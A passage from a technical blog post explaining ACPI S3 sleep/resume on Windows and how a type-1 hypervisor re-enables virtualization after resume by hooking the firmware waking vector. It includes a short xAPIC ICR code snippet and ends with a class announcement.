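/* ICR high value targeting a specific xAPIC ID (ICR bits 56-63). */
uint32_t icr_dest(uint8_t apic_id)
{
    return (uint32_t)apic_id << 24;
}
```

The SIPI vector encodes only the page number, which is why AP start-up code such as a copied real-mode stub has to live at a 4KB-aligned address in low memory.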
If you are interested in how exactly the OS waking vector is set up and resumes the system states, I suggest reverse engineering HaliAcpiSleep() on your own. The way it factors code to keep the flow as straightforward as possible is a masterpiece.

Note that on VMware, step 1 of the pre-S3 steps and steps 1-3 of the post-S3 steps are skipped. Windows on VMware does not need them, as the VMware hypervisor directly restores system states instead of going through the full S3 resume boot path.

Handling S3 with Type-1 Hypervisor

As mentioned previously, S3 is a challenge for a type-1 hypervisor that is loaded during the TSL phase because:
  • On resume, the TSL phase is skipped, so the hypervisor has no opportunity to get called.
  • On resume, virtualization is disabled and needs to be re-enabled.
  • It cannot add its own boot script to trigger reinitialization, because boot scripts are already locked by the TSL phase.
One may employ a guest support module that subscribes to the resume event and notifies the hypervisor to trigger reinitialization, but it is neither secure, portable, nor reliable. Another quick-and-dirty way is to disable S3 by altering the ACPI table, which has an obvious user experience issue.

A far superior way is to hook the OS waking vector. This works as follows:
  1. The hypervisor intercepts IO access to the PM1 control register(s)
  2. When the guest attempts to write to the register to enter sleep, the hypervisor 
    1. overwrites contents of the Firmware Waking Vector field with its own waking vector address, and
    2. writes to the register and lets the system enter S3
  3. When the system wakes up, hypervisor's waking vector is executed, and it
    1. reenables virtualization (with VMXON for example) 
    2. sets up the guest state to emulate execution of the guest's waking vector (i.e., the guest's RIP is set to the guest waking vector)
    3. launches the guest (with VMLAUNCH for example)
Hypervisor resuming from S3

This way, the hypervisor can take control over the system before running any OS (guest) specific code. Implementation of this can be found in multiple hypervisors such as ACRN Embedded Hypervisor and Bitvisor.  

For completeness, note that a type-1 hypervisor that is part of an OEM firmware image or a PEI module does not have to do any of this. If the module were part of the OEM image, it would be able to add a boot script to register reinitialization, and if the module were a PEI module, it would be executed even in the S3 resume boot path.

Conclusion

Entering and resuming from S3 is complex work that involves the OS, system firmware, and hardware implementations, as well as multiple specifications such as PI and ACPI. However, studying it allows us to familiarize ourselves with the industry standards and intriguing low-level implementation details.

As a side note, I recommend learning type-1 hypervisors over OS kernel-based ones. A type-1 hypervisor is not only more flexible; it also lets you understand in greater detail how the system works (and is arguably a more common design among production-level hypervisors). Registration for the public hypervisor development class is still suspended, but I am looking into reopening it sometime next year as a remote class. If you are interested, please reach out to tanda.sat@gmail.com for details.

References

EDIT

  • Nov 25 - Correct that the boot phase relevant to 3rd party type 1 hypervisor is TSL and not BDS.